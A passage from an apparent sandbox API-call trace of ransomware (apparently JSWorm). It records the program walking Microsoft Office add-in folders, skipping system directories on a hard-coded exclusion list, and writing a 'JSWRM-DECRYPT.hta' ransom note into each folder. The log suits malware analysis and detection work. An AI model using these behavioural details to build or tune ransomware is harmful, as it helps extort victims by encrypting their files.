lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 43 [0123.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.208] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Excel.resources.dll", cchWideChar=43, lpMultiByteStr=0x22ce70, cbMultiByte=43, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Excel.resources.dll", lpUsedDefaultChar=0x0) returned 43 [0123.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232e88 | out: hHeap=0x1e0000) returned 1 [0123.208] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244be8 [0123.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f19f0 | out: hHeap=0x1e0000) returned 1 [0123.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.208] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.208] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x6d2b978, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x6d2b978, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x6d2b978, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2f040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Windows.resources.dll", cAlternateFileName="MICROS~4.DLL")) returned 1 [0123.208] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2=".") returned 1 [0123.208] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="..") returned 1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="...") returned 1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="windows") returned -1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="recovery") returned -1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="perflogs") returned -1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="documents and settings") returned 1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="system volume information") returned -1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Windows.resources.dll", lpString2="msocache") returned -1 [0123.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0123.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0123.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d260, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0123.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232d50 [0123.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 45 [0123.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0123.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Client.Windows.resources.dll", cchWideChar=45, lpMultiByteStr=0x22d298, cbMultiByte=45, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Client.Windows.resources.dll", lpUsedDefaultChar=0x0) returned 45 [0123.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232d50 | out: hHeap=0x1e0000) returned 1 [0123.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x245200 [0123.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244be8 | out: hHeap=0x1e0000) returned 1 [0123.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0123.209] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0123.209] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x51c07e2, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x51c07e2, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x51c07e2, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Document.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2=".") returned 1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="..") returned 1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="...") returned 1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="windows") returned -1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="recovery") returned -1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="perflogs") returned -1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="documents and settings") returned 1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="system volume information") returned -1 [0123.209] lstrcmpiW (lpString1="Microsoft.Mashup.Document.resources.dll", lpString2="msocache") returned -1 [0123.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0123.209] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.209] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22cdc8, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0123.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bda8 [0123.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 39 [0123.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0123.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.Mashup.Document.resources.dll", cchWideChar=39, lpMultiByteStr=0x22ce70, cbMultiByte=39, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.Mashup.Document.resources.dll", lpUsedDefaultChar=0x0) returned 39 [0123.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bda8 | out: hHeap=0x1e0000) returned 1 [0123.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x130) returned 0x244978 [0123.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x245200 | out: hHeap=0x1e0000) returned 1 [0123.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0123.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.210] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56f7a52, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56f7a52, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x595a0ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xac040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 1 [0123.210] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2=".") returned 1 [0123.210] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="..") returned 1 [0123.210] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="...") returned 1 [0123.210] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="windows") returned -1 [0123.210] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="recovery") returned -1 [0123.210] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="perflogs") returned -1 [0123.210] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="documents and settings") returned 1 [0123.210] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="$RECYCLE.BIN") returned 1 [0123.210] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="system volume information") returned -1 [0123.210] lstrcmpiW (lpString1="Microsoft.MashupEngine.resources.dll", lpString2="msocache") returned -1 [0123.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22bfb8 [0123.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0a0, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22bfb8 | out: hHeap=0x1e0000) returned 1 [0123.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0123.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 36 [0123.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0123.210] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Microsoft.MashupEngine.resources.dll", cchWideChar=36, lpMultiByteStr=0x22d0d8, cbMultiByte=36, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Microsoft.MashupEngine.resources.dll", lpUsedDefaultChar=0x0) returned 36 [0123.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0123.210] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x120) returned 0x23ef08 [0123.210] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x244978 | out: hHeap=0x1e0000) returned 1 [0123.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0123.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.211] FindNextFileW (in: hFindFile=0x231bc0, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0x56f7a52, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0x56f7a52, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x595a0ab, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xac040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.MashupEngine.resources.dll", cAlternateFileName="MICROS~3.DLL")) returned 0 [0123.211] FindClose (in: hFindFile=0x231bc0 | out: hFindFile=0x231bc0) returned 1 [0123.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23ef08 | out: hHeap=0x1e0000) returned 1 [0123.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b568 | out: hHeap=0x1e0000) returned 1 [0123.211] FindNextFileW (in: hFindFile=0x232080, lpFindFileData=0x345e258 | out: lpFindFileData=0x345e258*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x5101cbd, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x1fc8d4, cFileName="ko", cAlternateFileName="")) returned 1 [0123.211] lstrcmpiW (lpString1="ko", lpString2=".") returned 1 [0123.211] lstrcmpiW (lpString1="ko", lpString2="..") returned 1 [0123.211] lstrcmpiW (lpString1="ko", lpString2="...") returned 1 [0123.211] lstrcmpiW (lpString1="ko", lpString2="windows") returned -1 [0123.211] lstrcmpiW (lpString1="ko", lpString2="recovery") returned -1 [0123.211] lstrcmpiW (lpString1="ko", lpString2="perflogs") returned -1 [0123.211] lstrcmpiW (lpString1="ko", lpString2="documents and settings") returned 1 [0123.211] lstrcmpiW (lpString1="ko", lpString2="$RECYCLE.BIN") returned 1 [0123.211] lstrcmpiW (lpString1="ko", lpString2="system volume information") returned -1 [0123.211] lstrcmpiW (lpString1="ko", lpString2="msocache") returned -1 [0123.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b398 [0123.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0123.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b2b0 [0123.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b0e0 [0123.211] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.211] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b0e0 | out: hHeap=0x1e0000) returned 1 [0123.211] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ko\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ko\\jswrm-decrypt.hta")) returned 0xffffffff [0123.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0123.212] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345b0bc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0123.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0123.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24f1e0 [0123.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0123.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x250fb0 [0123.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24f1e0 | out: hHeap=0x1e0000) returned 1 [0123.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.212] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.212] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.212] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ko\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ko\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x338 [0123.213] SetFilePointer (in: hFile=0x338, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0123.213] WriteFile (in: hFile=0x338, lpBuffer=0x345b1d0*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345b19c, lpOverlapped=0x0 | out: lpBuffer=0x345b1d0*, lpNumberOfBytesWritten=0x345b19c*=0x230c, lpOverlapped=0x0) returned 1 [0123.214] CloseHandle (hObject=0x338) returned 1 [0123.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x250fb0 | out: hHeap=0x1e0000) returned 1 [0123.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b2b0 | out: hHeap=0x1e0000) returned 1 [0123.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b568 [0123.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b480 [0123.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22ad40 [0123.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b820 [0123.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x14e) returned 0x21c578 [0123.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b820 | out: hHeap=0x1e0000) returned 1 [0123.215] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ko\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\microsoft office\\root\\office16\\addins\\microsoft power query for excel integrated\\bin\\ko\\jswrm-decrypt.hta")) returned 0x20 [0123.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x21c578 | out: hHeap=0x1e0000) returned 1 [0123.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ad40 | out: hHeap=0x1e0000) returned 1 [0123.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xe0) returned 0x22b908 [0123.215] FindFirstFileW (in: lpFileName="C:\\Program Files\\Microsoft Office\\root\\Office16\\ADDINS\\Microsoft Power Query for Excel Integrated\\bin\\ko\\*.*", lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4019a86c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName=".", cAlternateFileName="")) returned 0x232240 [0123.215] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0123.215] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf12b7378, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x5101cbd, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0x4019a86c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="..", cAlternateFileName="")) returned 1 [0123.215] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0123.215] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0123.215] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4019a86c, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x4019a86c, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x4019a86c, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0123.215] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0123.215] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0123.215] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0123.215] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0123.215] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0123.215] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0123.215] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0123.215] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0123.215] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0123.215] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0123.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0123.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0123.215] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241060, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0123.215] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0123.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0123.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241100 [0123.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241100, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0123.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0123.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x100) returned 0x1f19f0 [0123.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22b908 | out: hHeap=0x1e0000) returned 1 [0123.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241100 | out: hHeap=0x1e0000) returned 1 [0123.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0123.216] FindNextFileW (in: hFindFile=0x232240, lpFindFileData=0x345def0 | out: lpFindFileData=0x345def0*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf99462e6, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xf99462e6, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf99462e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0xf040, dwReserved0=0x60002, dwReserved1=0x22b0cc, cFileName="Microsoft.Mashup.Client.Excel.resources.dll", cAlternateFileName="MICROS~2.DLL")) returned 1 [0123.216] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2=".") returned 1 [0123.216] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="..") returned 1 [0123.216] lstrcmpiW (lpString1="Microsoft.Mashup.Client.Excel.resources.dll", lpString2="...") returned 1 [0123.216] lstrcmpiW 